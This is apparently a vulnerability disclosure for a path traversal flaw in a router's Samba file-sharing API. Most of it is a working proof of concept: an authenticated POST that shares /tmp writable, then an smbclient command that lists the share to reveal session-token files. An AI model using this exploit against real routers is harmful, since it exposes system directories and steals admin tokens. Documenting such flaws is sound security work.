Path Traversal
Through the file sharing feature, it is possible to share and arbitrary directory, such as /tmp or /etc as there is no server-side filter to limit only the USB path.
Proof of Concept:
Request
POST /cgi-bin/api/files/samba/set HTTP/1.1
Host: 192.168.8.1
Content-Length: 54
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
Authorization: 75ab86c20b444a69918f6a523b5068f4
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.65 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.8.1
Referer: http://192.168.8.1/
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: Admin-Token=75ab86c20b444a69918f6a523b5068f4
Connection: close
path=/tmp&lan_share=true&wan_share=false&writable=true
On the shell
smbclient //192.168.8.1/GL-Samba -U user% -c 'ls' | grep gl_token
WARNING: The "syslog" option is deprecated
gl_token_75ab86c20b444a69918f6a523b5068f4 N 2972 Sun Mar 19 07:55:31 2023